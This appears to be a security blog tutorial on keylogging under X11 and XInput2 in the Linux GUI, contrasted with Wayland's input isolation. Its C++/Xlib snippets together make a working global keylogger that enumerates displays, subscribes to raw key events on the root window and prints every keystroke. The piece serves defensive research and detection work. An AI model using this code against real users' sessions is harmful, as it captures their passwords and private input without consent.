Alerts This Week
Warning Icon 1 933
Alerts This Week
Warning Icon 1 933

Keylogging in Linux (Part 2): Advanced Techniques in the Linux GUI and X Server

24.Key Code Esm H500

Why Advanced Keylogging Techniques Depend on the Linux GUI

Advanced keylogging leans on the Linux GUI because once a user signs into a graphical session, the input path stops being simple. The GUI decides which window receives focus, how toolkits interpret the keystrokes, and when events get redirected or buffered, so the attacker’s visibility changes. The hardware layer still shows the raw signal. It just doesn’t reflect how people actually work on a desktop, and that gap is exactly where more capable keyloggers operate.

 Capturing device events is useful, but it only tells you what the keyboard produced, not what the system delivered to an application. That difference is why we’re stepping into the GUI stack. Desktop environments reshape input constantly, and those transformations create opportunities for interception that never appear at the device layer. Teams studying adversary behavior look at these layers because this is where real workflows live, and where visibility can quietly break.

So we focus on how keystrokes move through the X server and the rest of the graphical stack. This stays within authorized research, the kind defenders use to understand how attackers abuse X11’s trusted client model or how Wayland tightens the rules as it becomes the default in Fedora, Ubuntu sessions, and GNOME. Some applications still run under XWayland and behave a bit differently, which adds one more wrinkle for anyone mapping these input paths.

What Is the Linux GUI Stack?

The Linux GUI works as a set of stacked components rather than one built-in interface from the OS. The kernel handles raw input at the bottom, the X server manages windows and display surfaces above it, and toolkits like GTK, Qt, and WxWidgets turn those low-level signals into the controls users interact with. Desktop environments pull those parts together into the workspace people expect. It’s a simple structure on paper, but the layers change how keystrokes move once the system is fully up.

Keyboard events start in the kernel’s input subsystem and reach the X server before anything else touches them. From there, Xlib hands events to applications, toolkits reshape them into widget actions, and the desktop environment overlays shortcuts and policies that can shift routing. That’s why GUI-level keylogging exposes behavior. Device-level capture won’t surface. The earlier walk-through of device-event keylogging in the Complete Guide to Keylogging in Linux: Part 1 sets that baseline, so the differences here land cleanly.

   +---------------+                            +--------------+
   |  Display:2    |<--=---+ +----=--->|  WxWidget     |-----+
   +---------------+       |             |         +--------------+     |
                           |             |                            |
   +---------------+       |             |         +--------------+     |
   |  Display:1    |<--=---+ +----=--->|     Qt        |-----+
   +---------------+       |             |         +--------------+     |
                           |             |                            |
   +---------------+       |             |         +--------------+     |
   |  Display:0    |<--=---+ +----=--->|    GTK+       |-----+
   +---------------+       |             |         +--------------+     |
                           |             |                            |
       update   +-------------+--+  ---=---> +-----+--------+   send data   |
   +------=--|   X Server     |           |    xlib     |<-------------=------+
   | screen  +----------------+  <--=---- +--------------+ ask to repaint | ^ | | events | +---------+----------------+ +-->|     Linux Kernel         |
        +------------------------+

What X Server Terminology Should I Know?

The X server defines the structure on which the Linux GUI runs, and a few terms help make sense of how input moves through it. A display is the full X session, and each screen is a framebuffer inside that session, mapped to a physical monitor. A screen usually lines up with one monitor, though it can span more when the desktop needs the extra space. The root window sits at the base of each screen and anchors every window drawn above it. And the virtual core device is X11’s unified view of keyboard and pointer input, even when the underlying hardware shifts around.

The X Server’s Role in the Linux GUI: Why GUI-Level Input Capture Is Possible

The X server controls the input path in the Linux GUI, so it sees keystrokes before toolkits or applications touch them. It manages focus, coordinates, and routing, which gives it a full view of what the user is doing at any moment. X11’s trusted client model makes this more interesting. Any authorized client can subscribe to the same events an application receives, which is why GUI-level keylogging exists at all. It’s not a loophole — it’s the protocol.

Toolkits like GTK and Qt sit one level higher and only act on the events the server hands them. They turn those events into widget actions, but they don’t influence the server’s routing or timing. That split matters when analysts trace where visibility begins and ends. The architecture behind it is documented in the XInput 2 device and event model, outlined in the XI2 protocol specification, and it shows how predictable this behavior really is.

How Does Keylogging Work in an X Server?

In the Linux GUI, XInput2 sits between the raw hardware signals and the events that applications actually consume. That middle layer is what makes GUI-level keylogging possible, since the server exposes both the unprocessed device data and the keystrokes delivered after focus and mapping rules take over. It’s easier to see how this works once the main pieces are lined up. 

Raw vs. Cooked Events

  • Raw events reflect the physical device state before the server interprets anything.
  • Cooked events show what the focused window receives after mapping, grabs, and layout rules.
  • Watching both streams highlights where toolkits or compositors reshape input, which matters when you’re analyzing behavior.

Master and Slave Devices

  • Slave devices represent the physical keyboards and pointers attached to the system.
  • Master devices are the logical inputs that applications rely on.
  • The server binds slaves to masters so hardware changes don’t break the session.
  • Keyloggers track the master device because it reflects the user’s active input across all physical hardware.

XI2 Version Differences

  • XI2.0 introduced raw events and the master/slave hierarchy.
  • XI2.1 refined device class handling.
  • XI2.2 improved touch behavior.
  • XI2.3 adjusted how grabs and focus interact, which changes what a client can observe.
  • These details come from the XInput2 device model, defined in the libXi interface documentation, and they shape how clients access keyboard events in the first place.
  • 
    [Physical Keyboard Input]
                │
         [Kernel Input Layer]
                │
         [XInput2 Slave Device]
                │
         [XInput2 Master Device]
                │
     ┌──────────────┐
     │  Raw Events  │ <─── Captured by keylogger
     └──────────────┘
                │
      [X Server Routing Logic]
                │
     ┌──────────────┐
     │ Cooked Events│ <─── Delivered to focused application
     └──────────────┘
                │
         [Toolkits: GTK/Qt]
                │
        [Application Widgets]
    

    How a Client Captures Events

    • Connect to the X server.
    • Confirm the XInput extension is present.
    • Select key-press and key-release events on the master device.
    • Read events from the server’s queue in a loop.
    • The server handles routing and device management long before the application ever sees those events.

    How Do I List Active X Server Displays on a Linux System?

    In the Linux GUI, the X server creates a socket for each display under /tmp/.X11-unix. Files that start with X match the display numbers, so X0 maps to :0 and so on. It’s an easy way to see which sessions are running without asking the server for anything.

    A few guardrails decide what you can actually touch:

    • Xauthority controls access, so the socket being present doesn’t mean you can use it.
    • Permissions on the directory and the authority file often limit you to the session owner.
    • Multi-seat setups drop multiple sockets, each tied to its own keyboard, mouse, and monitor group.

    With that in mind, enumeration is just a directory walk. You filter for entries that look like displays, try to open them, and let the server tell you how many screens it owns and their dimensions. Nothing fancy — just checking what’s alive and what you’re allowed to see.

    std::vector EnumerateDisplay() {
        std::vector displays;
        for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix")) {
            std::string path = p.path().filename().string();
            std::string display_name = ":";
            if (path[0] != 'X') continue;
            path.erase(0, 1);
            display_name.append(path);
            Display *disp = XOpenDisplay(display_name.c_str());
            if (disp != NULL) {
                int count = XScreenCount(disp);
                printf("Display %s has %d screens\n", display_name.c_str(), count);
                for (int i = 0; i < count; i++) { Screen *s = ScreenOfDisplay(disp, i); printf("%d: %dx%d\n", i, s->width, s->height);
                }
            }
        }
    }
    

    Most workstations report a single display with one screen, usually a clean 1920×1080 layout. That view can narrow on systems that already follow best practices for hardening an Arch Linux system, where tighter permissions limit what the server is willing to reveal.

    Detecting XInputExtension Support in the Linux GUI Environment

    In the Linux GUI, the first step is checking whether the server exposes XInput2. Most displays support it cleanly, but version drift shows up under XWayland, where the compatibility layer reports newer versions even when the underlying behavior still follows older XI2 rules. Better to test for the version you expect rather than assume the server will match your code.

    // Set up X
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp) {
        std::cerr << "Cannot open X display: " << hostname << std::endl;
        exit(1);
    }
    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    // Request XInput 2.0, guarding against changes in future versions
    int major = 2, minor = 0;
    int queryResult = XIQueryVersion(disp, &major, &minor);
    if (queryResult == BadRequest) {
        std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
        exit(3);
    } else if (queryResult != Success) {
        std::cerr << "Internal error" << std::endl;
        exit(4);
    }
    

    Registering XInput Event Masks in the Linux GUI

    After the extension check, you tell the server which events you care about. XInput masks are straightforward: a device ID, a length, and a bitfield. In the Linux GUI, most teams target the master device so they don’t have to track each physical keyboard.

    typedef struct {
        int deviceid;
        int mask_len;
        unsigned char* mask;
    } XIEventMask;
    Window root = DefaultRootWindow(disp);
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;
    m.mask_len = XIMaskLen(XI_LASTEVENT);
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, false);
    free(m.mask);
    

    One thing worth noting: X11 allows this kind of global capture. Wayland does not. Wayland keeps input scoped to the active client, and those rules come from the core details of the Wayland protocol rather than anything in XInput2. XWayland sits between them and still honors X11-style masks for legacy clients, which explains why this path continues to work on modern desktops.

    Reading Keyboard Events in the Linux GUI Using XGenericEventCookie

    With the mask in place, reading events is just a loop. X11 gives you a GenericEvent, you unwrap the cookie, and you check the event type. The server handles layout rules, Unicode mapping, and most multi-layout quirks through XKB. Some edge cases still slip through — partial mappings, rare layouts, hardware with unusual scan codes — which is why teams building detection pipelines tend to validate their assumptions against recent work on keyboard event behavior instead of trusting defaults.

    typedef struct {
        int type;
        unsigned long serial;
        Bool send_event;
        Display *display;
        int extension;
        int evtype;
        unsigned int cookie;
        void *data;
    } XGenericEventCookie;
    
    while (true) {
        XEvent event;
        XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
        XNextEvent(disp, &event);
        if (XGetEventData(disp, cookie) &&
            cookie->type == GenericEvent &&
            cookie->extension == xiOpcode) {
            switch (cookie->evtype) {
                case XI_RawKeyRelease:
                case XI_RawKeyPress: {
                    XIRawEvent *ev = (XIRawEvent*)cookie->data;
                    // Ask X what it calls that key
                    KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                    if (NoSymbol == s) continue;
                    char *str = XKeysymToString(s);
                    if (NULL == str) continue;
                    std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-")
                              << str << " " << std::flush;
                    break;
                }
            }
        }
    }
    

    The nice part about this path is that X11 handles the ugly pieces — keyboard maps, multiple layouts, and scan code translation — so you don’t have to rebuild any of it yourself. It keeps the loop simple, even when the underlying setup isn’t.

    Security Limitations of X11 in the Linux GUI

    X11 in the Linux GUI still follows a trust model where clients share more information than they should. The design predates any notion of isolating one application’s input from another, and that gap shows up fast when you look at how the server handles raw events.

    • Global input visibility: any client that registers for raw events can see keystrokes across the whole session, not just its own window.
    • No real isolation: focus only affects cooked events; the raw stream is still mirrored to every client listening.
    • XWayland inherits this: legacy behavior survives in the compatibility layer, even though native Wayland apps stay confined to their own surfaces. The difference aligns with how desktops interpret the Wayland model's baseline expectations.
    • Cross-application leakage: timing, key transitions, and visibility across windows are all well documented in studies of input behavior and show how much X11 exposes during normal use.

    For testing, the full keylogger implementation helps you trace how raw events move through the server and where boundaries actually sit. It’s a controlled-lab tool, not something you run against another user’s session, and it shows why X11’s older model still matters when you’re evaluating input visibility on a modern desktop.

    FAQ: Common Questions About Input Capture in the Linux GUI

    Does the Linux GUI allow global keylogging?

    Under X11, yes. Any client with access to the display can subscribe to raw events and see keystrokes across the session, regardless of focus.

    Why does X11 permit global capture?

    The protocol was built around cooperative clients. It never introduced strict per-window boundaries, so the server still mirrors raw keyboard events to any client that registers for them.

    Does keylogging work under Wayland?

    Not in the same way. Wayland isolates input per client and doesn’t forward global events, so you only see the keystrokes meant for your own surfaces.

    What are raw vs cooked events?

    Raw events show the physical key transitions before mapping or focus rules. Cooked events are the interpreted keystrokes delivered to the active window after the server applies layout and state.

    Why does behavior differ under XWayland?

    XWayland runs legacy applications inside a compatibility layer, so those clients still follow X11’s visibility rules. Native Wayland apps follow stricter isolation, but X11 clients inside XWayland keep the older behavior.

    Final Thoughts on Keylogging in Linux

    X11 exposes more of a session than most teams expect, so defenders watch for clients that have no business listening to raw input. A process tapping event streams without a clear role shows up fast once you know the normal traffic. It feels off.

    During controlled tests, we lean on small keyboard-monitoring tools to see exactly what the server hands out and which parts of the stack leak more than they should, because X11 still reflects an older trust model that never really hid much.

    Wayland tightens those paths and drops most of the legacy exposure, though XWayland keeps enough of the old flow alive that you can’t treat it as sealed. The mix creates gaps in understanding if you’re not careful. Environments blend both stacks. And knowing which subsystem owns an event becomes key when you’re building detections that won’t trip on every hybrid desktop in the fleet.

    The next step is tying these observations into real detection signals — what to monitor, what to flag, and how to separate noise from actual risk. That’s where we pick up in Part 3 of this series.

Your message here